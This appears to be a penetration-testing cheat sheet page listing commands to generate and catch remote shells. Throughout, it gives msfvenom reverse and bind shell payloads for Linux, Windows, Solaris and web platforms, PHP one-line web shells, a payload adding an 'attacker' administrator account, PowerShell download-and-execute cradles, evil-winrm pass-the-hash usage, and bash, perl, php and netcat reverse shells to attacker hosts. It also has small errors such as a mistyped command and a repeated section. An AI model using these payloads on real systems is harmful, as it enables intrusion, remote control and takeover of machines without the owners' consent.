Shells

Web Shells

Locate and upload the appropriate shell from - /usr/share/webshells

Refer to https://www.revshells.com/ for more reverse shells

Recommended Reverse Ports to grab the reverse shell

nc -nlvp 80
nc -nlvp 443
nc -nlvp 3000
nc -nlvp 4444
nc -nlvp 8080

Reverse Shells (msfvenom)

shell/reverse_tcp = staged payload
shell_reverse_tcp = unstaged payload
Note that staged payload requires a meterpreter listener to send the second stage of the payload

For Linux

Reverse Shell

32-bit Systems - 
    msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<port> -f elf > shell-x86.elf
    msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f elf > shell-x86.elf

64-bit Systems - 
    msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<port> -f elf > shell-x64.elf
    msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f elf > shell-x64.elf

Bind Shell

32-bit Systems -
    msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=<IP> LPORT=<port> -f elf > bind.elf
    msfvenom -p linux/x86/shell/bind_tcp RHOST=<IP> LPORT=<port> -f elf > bind.elf
    msfvenom -p linux/x86/shell_bind_tcp RHOST=<IP> LPORT=<port> -f elf > bind.elf

64-bit Systems -
    msfvenom -p linux/x64/meterpreter/bind_tcp RHOST=<IP> LPORT=<port> -f elf > bind.elf
    msfvenom -p linux/x64/shell/bind_tcp RHOST=<IP> LPORT=<port> -f elf > bind.elf
    msfvenom -p linux/x64/shell_bind_tcp RHOST=<IP> LPORT=<port> -f elf > bind.elf

SunOS (Solaris)

msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf

For Windows

Reverse Shell

32-bit Systems - 
    msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<port> -f exe > shell-x86.exe
    msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f exe > shell-x86.exe

64-bit Systems -
    msfvenom -p windows/x64/shell/reverse_tcp LHOST=<IP> LPORT=<port> -f exe > shell-x64.exe
    msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f exe > shell-x64.exe

Bind Shell

32-bit Systems -
    msfvenom -p windows/meterpreter/bind_tcp RHOST=<IP> LPORT=<port> -f exe > bind.exe
    msfvenom -p windows/meterpreter_bind_tcp RHOST=<IP> LPORT=<port> -f exe > bind.exe
    
    msfvenom -p windows/shell/bind_tcp RHOST=<IP> LPORT=<port> -f exe > bind.exe
    msfvenom -p windows/shell_bind_tcp RHOST=<IP> LPORT=<port> -f exe > bind.exe
    
64-bit Systems -
    msfvenom -p windows/x64/meterpreter/bind_tcp RHOST=<IP> LPORT=<port> -f exe > bind.exe
    msfvenom -p windows/x64/meterpreter_bind_tcp RHOST=<IP> LPORT=<port> -f exe > bind.exe
    
    msfvenom -p windows/x64/shell/bind_tcp RHOST=<IP> LPORT=<port> -f exe > bind.exe
    msfvenom -p windows/x64/shell_bind_tcp RHOST=<IP> LPORT=<port> -f exe > bind.exe

CMD Shell

msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe

Run Command via exe

msfvenom -a [ x86 | x64 ] --platform Windows -p windows/exec CMD="<powershell | cmd command>" -f exe > payload.exe

Examples - 
    msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://<IP>/<payload>')\"" -f exe > payload.exe
    msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators <username> /add" -f exe > payload.exe

Create User via exe

msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe

Meterpreter Listener

Launch msfconsole - sudo msfconsole

Run the following -
    use exploit/multi/handler
    set PAYLOAD <payload>
    set LHOST <attacker IP>
    set LPORT <attacker listening port>
    run

Web-based Payloads

PHP

Web Shells -
 <?php system($_GET['cmd']); ?>
 <?php system($_REQUEST["cmd"]); ?>

Reverse Shells -
 <?php system('nc.exe -e cmd.exe <attacker IP> <port>') ?>
 msfvenom -p php/meterpreter_reverse_tcp LHOST=<attacker IP> LPORT=<port> -f raw > shell.php
 
 cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
 php -r '$sock=fsockopen("<attacker IP>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'

ASP(X)

Web Shells -
 /usr/share/webshells/aspx/cmdasp.aspx
 /usr/share/webshells/aspx/shell.aspx
  # Modify shell.aspx variables, string host, and int port

Reverse Shells -	
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<port> -f asp > reverse.asp
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<port> -f aspx > reverse.aspx

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker IP> LPORT=<port> -f raw> reverse.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker IP> LPORT=<port> -f war > reverse.war

NodeJS

sfvenom -p nodejs/shell_reverse_tcp LHOST=<attacker IP> LPORT=<port>

Script Language Payloads

Evil-WinRM

evil-winrm -i <ip> -u <username> -p <password>
evil-winrm -i <ip> -u <username> -H <NTLM hash>
 # Verify usability with: crackmapexec winrm <ip>
 # Look for port 5985 in nmap scans

> Use the download command to download files while in a evil-winrm session
 # download /relative/file/path/<filename>
> Use the upload command to download files while in a evil-winrm session
 # upload /relative/file/path/<filename>

Powercat.ps1

Download payload:
    powershell -nop -w hidden IEX(New-Object System.Net.WebClient).DownloadString('http://<IP>/powercat.ps1')

Initiate reverse shell:
    powercat -c <IP> -p <Port> -e powershell

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=(<IP>) LPORT=(<port>) -f raw > reverse.pl

Python

msfvenom -p cmd/unix/reverse_python LHOST=(<IP>) LPORT=(<port>) -f raw > reverse.py

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<Kali IP>:<Kali port>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

PHP

Web Shells -
 <?php system($_GET['cmd']); ?>
 <?php system($_REQUEST["cmd"]); ?>

Reverse Shells -
 <?php system('nc.exe -e cmd.exe <attacker IP> <port>') ?>
 php -r '$sock=fsockopen("<attacker IP>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'

BASH

Create a .sh file and write the following
 #!/bin/bash
 /bin/bash -c "bash -i >& /dev/tcp/192.168.45.200/9090 0>&1"

NC

nc -nv <IP> <port> -e /bin/bash
nc -nv <IP> <port> -e /bin/sh
nc -nv <IP> <port> -c /bin/bash
nc -nv <IP> <port> -c /bin/sh

nc64.exe <IP> <port> -e cmd
nc64.exe <IP> <port> -e powershell
nc64.exe <IP> <port> -t -e cmd
nc64.exe <IP> <port> -t -e powershell

PreviousDefault/Common Credentials NextTTY Shell

Last updated 7 months ago